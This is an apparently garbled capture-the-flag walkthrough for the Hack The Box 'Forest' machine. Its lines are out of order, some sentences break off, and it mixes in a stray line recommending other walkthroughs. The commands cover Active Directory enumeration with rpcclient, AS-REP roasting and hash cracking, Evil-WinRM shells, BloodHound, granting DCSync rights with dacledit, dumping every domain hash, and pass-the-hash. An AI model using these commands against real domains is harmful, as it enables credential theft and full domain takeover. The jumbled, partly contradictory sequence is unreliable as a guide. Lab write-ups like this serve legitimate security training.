net group "Exchange Windows Permissions" hacker /add /domain
3. Write discretionary ACLs (DCSync Attack)
From our Evil-WinRM shell, we need to download and execute SharpHound, the BloodHound data collector. First, start a Python HTTP server on your attacking machine:
Use enumdomusers to generate a list of valid usernames, such as , andy, and mark.
Phase 2: Initial Access via AS-REP Roasting
Identify users that do not require Kerberos pre-authentication. Use GetNPUsers.py from the Impacket suite to request an AS-REP for the user svc-alfresco. Extract the hash and crack it locally using John the Ripper to obtain the plaintext password.
Use the cracked credentials to gain a remote shell via Evil-WinRM.
Privilege Escalation
BloodHound Analysis
SharpHound
With a list of valid usernames, check for accounts that do not require Kerberos pre-authentication. This attack vector is known as AS-REP Roasting.
Executing the Attack
The script dumps the password hashes for all domain users, including the Administrator account:
rpcclient -U "" -N 10.10.10.161 enumdomusers
The tool successfully retrieves a Kerberos AS-REP hash for the user svc-alfresco.
Cracking the Hash
If the credentials are valid and WinRM is available, access can be gained via evil-winrm:
evil-winrm -i 10.10.10.161 -u svc-alfresco -p [password]
Phase 4: Privilege Escalation
hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force
Find domain: DC=htb,DC=local
You do not need to crack the Administrator password. Use the obtained NTLM hash to log in directly via Pass-the-Hash using evil-winrm.
Check for users with :
Here are the best Forest walkthroughs (especially the ones rated highly by the community on forums, GitHub, or YouTube):
python3 dacledit.py -action grant -principal attacker -rights DCSync -dc-ip 10.10.10.161 htb.local/attacker:Password123!
Step 4: Perform a DCSync Attack